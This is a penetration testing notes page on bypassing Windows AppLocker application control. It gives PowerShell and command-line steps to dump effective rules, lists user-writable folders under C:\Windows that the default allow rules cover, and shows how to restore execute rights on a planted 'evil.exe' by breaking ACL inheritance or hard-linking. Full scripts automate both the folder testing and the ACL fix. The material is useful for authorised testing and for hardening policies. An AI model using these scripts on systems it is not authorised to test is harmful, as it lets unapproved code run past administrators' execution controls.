Infrastructure penetration testing notes

Applocker

Last updated 4 years ago

AppLocker advances the app control features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules to allow or deny apps from running based on unique identities of files and to specify which users or groups can run those apps.

An AppLocker block message looks like this:

Program 'a.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator At line:1 char:1

View AppLocker policy

What you are looking for is a folder the user can write to that is exempt from (or allowed by) the AppLocker policy. Any of the following lists the rules; the first reads the local policy object (use -Effective instead of -Local to include rules pushed by GPO), the second and third read the raw policy from the registry. The GUID in the last command is one rule ID under the Exe collection, taken from an example system; substitute an ID from your own query.

(Get-AppLockerPolicy -Local).RuleCollections 
or
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse 
or
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\560d03c2-b277-4331-8c59-bc7d4eb08359

Example for Applocker

PowerShell

There is a PowerShell module named AppLocker that can query the rules enforced on the current system. The script below prints the effective rules in a readable form so you can use that information to bypass them; note that it only walks collections whose EnforcementMode is Enabled, so collections in AuditOnly mode (which log but do not block) are skipped.

Import-Module AppLocker
[xml]$data = Get-AppLockerPolicy -effective -xml

# Extracts All Rules and print them.
Write-Output "[+] Printing Applocker Rules [+]`n"
($data.AppLockerPolicy.RuleCollection | ? { $_.EnforcementMode -match "Enabled" }) | ForEach-Object -Process {
    Write-Output ($_.FilePathRule | Where-Object {$_.Name -NotLike "(Default Rule)*"}) | ForEach-Object -Process {Write-Output "=== File Path Rule ===`n`n Rule Name : $($_.Name) `n Condition : $($_.Conditions.FilePathCondition.Path)`n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
    Write-Output ($_.FileHashRule) | ForEach-Object -Process { Write-Output "=== File Hash Rule ===`n`n Rule Name : $($_.Name) `n File Name :  $($_.Conditions.FileHashCondition.FileHash.SourceFileName) `n Hash type : $($_.Conditions.FileHashCondition.FileHash.Type) `n Hash :  $($_.Conditions.FileHashCondition.FileHash.Data) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
    Write-Output ($_.FilePublisherRule | Where-Object {$_.Name -NotLike "(Default Rule)*"}) | ForEach-Object -Process {Write-Output "=== File Publisher Rule ===`n`n Rule Name : $($_.Name) `n PublisherName : $($_.Conditions.FilePublisherCondition.PublisherName) `n ProductName : $($_.Conditions.FilePublisherCondition.ProductName) `n BinaryName : $($_.Conditions.FilePublisherCondition.BinaryName) `n BinaryVersion Min. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.LowSection) `n BinaryVersion Max. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.HighSection) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
}
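The following is an added example, not code from the original page. Rather than reading the rules, it asks the policy engine directly: it snapshots the effective policy to XML and uses the built-in Test-AppLockerPolicy cmdlet to report, for each candidate folder, whether a copy of your binary placed there would be allowed for a given user and which rule made the decision. The payload path, the user to test as and the candidate folder list are assumptions; each copy is removed after it has been tested.

```powershell
# Added example: evaluate the effective AppLocker policy against candidate drop locations.
Import-Module AppLocker

$Payload    = 'C:\Users\Public\a.exe'   # assumption: the binary you want to run, already on disk
$User       = 'Everyone'                # assumption: account or group to evaluate the policy for
$Candidates = @(                        # assumption: writable folders under an allowed root, plus a control
    'C:\Windows\Tasks',
    'C:\Windows\Temp',
    'C:\Windows\System32\FxsTmp',
    'C:\Windows\System32\spool\drivers\color',
    'C:\Users\Public'                   # control: not covered by the default %WINDIR% / %PROGRAMFILES% rules
)

# Snapshot the effective policy (local + GPO) to a file; Test-AppLockerPolicy evaluates that XML.
$policyXml = Join-Path $env:TEMP 'applocker-effective.xml'
Get-AppLockerPolicy -Effective -Xml | Set-Content -Path $policyXml

foreach ($dir in $Candidates) {
    $dest = Join-Path $dir (Split-Path $Payload -Leaf)
    try {
        # Copying the file also proves the folder is writable for the current user.
        Copy-Item -Path $Payload -Destination $dest -ErrorAction Stop
    } catch {
        Write-Output ("{0,-45} not writable ({1})" -f $dir, $_.Exception.Message)
        continue
    }

    # PolicyDecision is Allowed / Denied / AllowedByDefault / DeniedByDefault;
    # MatchingRule names the rule that decided, or is empty for a by-default decision.
    $r = Test-AppLockerPolicy -XmlPolicy $policyXml -Path $dest -User $User
    Write-Output ("{0,-45} {1,-18} rule: {2}" -f $dir, $r.PolicyDecision, $r.MatchingRule)

    Remove-Item -Path $dest -Force -ErrorAction SilentlyContinue
}
```

Run it as the low-privileged user whose access you are testing: the copy step then reflects that user's real NTFS rights, while -User lets you evaluate the rules for a different principal without switching accounts.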

Bypass

The default rules allow Everyone to run anything located under the following paths (and allow the local Administrators group to run anything at all):

%WINDIR%\*

%PROGRAMFILES%\*

Because these are path rules, any folder below those roots that a standard user can write to is a place from which that user can execute.

Folders under C:\Windows that are writable by standard users on many Windows builds, and therefore covered by the default %WINDIR% allow rule (the set varies by version and patch level, so verify on the target):

C:\Windows\Tasks  
C:\Windows\Temp  
C:\windows\tracing 
C:\Windows\Registration\CRMLog 
C:\Windows\System32\FxsTmp 
C:\Windows\System32\com\dmp 
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 
C:\Windows\System32\spool\PRINTERS 
C:\Windows\System32\spool\SERVERS 
C:\Windows\System32\spool\drivers\color 
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter 
C:\Windows\SysWOW64\FxsTmp 
C:\Windows\SysWOW64\com\dmp 
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter 
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System 

If you can place a file or folder into one of these paths you become the owner of that object and can change its ACL, in the GUI or with icacls, including adding Execute rights. If a Deny Execute ACE is inherited from the folder, either disable inheritance on the file, or create a hard link inside the folder to a file you own elsewhere on the same volume: an NTFS ACL belongs to the file, not to the directory entry, so the link carries the ACL of the original file and the folder's inherited deny does not apply to it. Either command creates the link (first argument is the new link, second the existing file):

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

You can check for additional writable paths with accesschk from Sysinternals (-w writable objects only, -s recurse, -q no banner, -u suppress errors), once for each principal the current user belongs to:

accesschk -w -s -q -u Users "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u Everyone "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u Interactive "C:\Program Files" >> programfiles.txt 

accesschk -w -s -q -u Users "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u Everyone "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u Interactive "C:\Program Files (x86)" >> programfilesx86.txt 

accesschk -w -s -q -u Users "C:\Windows" >> windows.txt 
accesschk -w -s -q -u Everyone "C:\Windows" >> windows.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Windows" >> windows.txt 
accesschk -w -s -q -u Interactive "C:\Windows" >> windows.txt 
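The steps above (drop a file in a writable folder under an allowed root, check what it inherited, then fix execute rights by breaking inheritance or by hard-linking) as one added example, not code from the original page. The source and target paths are assumptions; the source file must be owned by the current user and sit on the same volume as the target.

```powershell
# Added example: plant a file, inspect the ACL it inherits, and restore execute rights.
$Source = 'C:\myfolder\plantedfile.exe'           # assumption: your binary, owned by you
$Target = 'C:\Windows\System32\FxsTmp\evil.exe'   # assumption: user-writable folder under %WINDIR%

function Get-ExecuteDenies {
    param([string]$Path)
    # Any Deny ACE whose rights include ExecuteFile blocks execution, whatever the allow ACEs say.
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Deny' -and
        (($_.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ExecuteFile) -ne 0)
    }
}

# 1. Copy the file in: the creator becomes owner, and an owner can always rewrite the DACL.
Copy-Item -Path $Source -Destination $Target -ErrorAction Stop
$denies = Get-ExecuteDenies -Path $Target

if (-not $denies) {
    Write-Output "No execute deny on $Target; nothing to fix"
}
else {
    $denies | ForEach-Object {
        Write-Output ("Deny {0} for {1} (inherited: {2})" -f $_.FileSystemRights, $_.IdentityReference, $_.IsInherited)
    }
    try {
        # 2a. Disable inheritance without copying the inherited ACEs, then grant yourself full control.
        $acl = Get-Acl -Path $Target
        $acl.SetAccessRuleProtection($true, $false)
        $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule($me, 'FullControl', 'Allow')
        $acl.AddAccessRule($rule)
        Set-Acl -Path $Target -AclObject $acl -ErrorAction Stop
        Write-Output "Inheritance disabled and FullControl granted to $me on $Target"
    }
    catch {
        # 2b. DACL rewrite refused: replace the copy with a hard link to the file you own.
        # The link shares the DACL of $Source (ACLs live on the file, not the directory entry),
        # so the folder's inherited deny never applies to it.
        Remove-Item -Path $Target -Force
        New-Item -ItemType HardLink -Path $Target -Target $Source | Out-Null
        Write-Output "Hard link created: $Target -> $Source"
    }
}

# Verify the result: no Deny ACE with ExecuteFile should remain.
if (Get-ExecuteDenies -Path $Target) { Write-Output 'Execute still denied' } else { Write-Output 'Execute allowed' }
```

New-Item -ItemType HardLink is the PowerShell equivalent of the fsutil and mklink commands above and fails with the same constraints: both paths must be on one NTFS volume, and on current Windows builds you need write access to the file being linked, which holds here because you own it.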

Tools

- unlock: Microsoft AppLocker evasion tool
- LOLBas: Living Off The Land Binaries And Scripts

Resources

- https://blog.pwn.al/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html